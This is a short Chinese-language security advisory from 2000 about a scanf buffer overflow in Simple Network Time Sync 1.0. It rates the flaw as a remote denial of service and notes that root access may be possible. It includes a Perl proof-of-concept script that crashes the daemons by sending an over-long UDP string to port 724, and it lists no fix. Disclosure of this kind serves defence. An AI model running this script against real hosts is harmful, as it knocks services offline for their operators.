SImple Network Time Sync daemon缓冲区溢出漏洞发布时间:2000-05-07 更新时间:2000-05-07 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Atrus Trivalie Productions Simple Network Time Sync 1.0详细描述 Atrus Trivalie 的Simple Network Time Sync 1.0程序中存在一个有问题的 scanf 函数调用,导致缓冲区溢出漏洞,此问题在RedHat 6.1上测试过。 攻击者有可能利用这个漏洞获取root权限,不过似乎只有50个字节的空间用于填 充shellcode。 测试代码 #!/usr/bin/perl -w # # Usage: ./kill_sntsd <hostname> # use Socket; send_packet(); # Needs to send 2 packets to kill the client and the server daemons send_packet(); sub send_packet { $proto = getprotobyname('udp'); $localaddr = gethostbyname("localhost") || die "error: $!\n"; $iaddr = gethostbyname($ARGV[0]) || die "$!\n"; $sin = sockaddr_in(724, $iaddr); $paddr = sockaddr_in(53, $localaddr); socket(SH, PF_INET, SOCK_DGRAM, $proto); bind(SH, $paddr); $|=1; connect(SH, $sin) || die "$!\n"; # A string longer than 50 characters... print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n"; close(SH); } 解决方案 尚无 相关信息 |
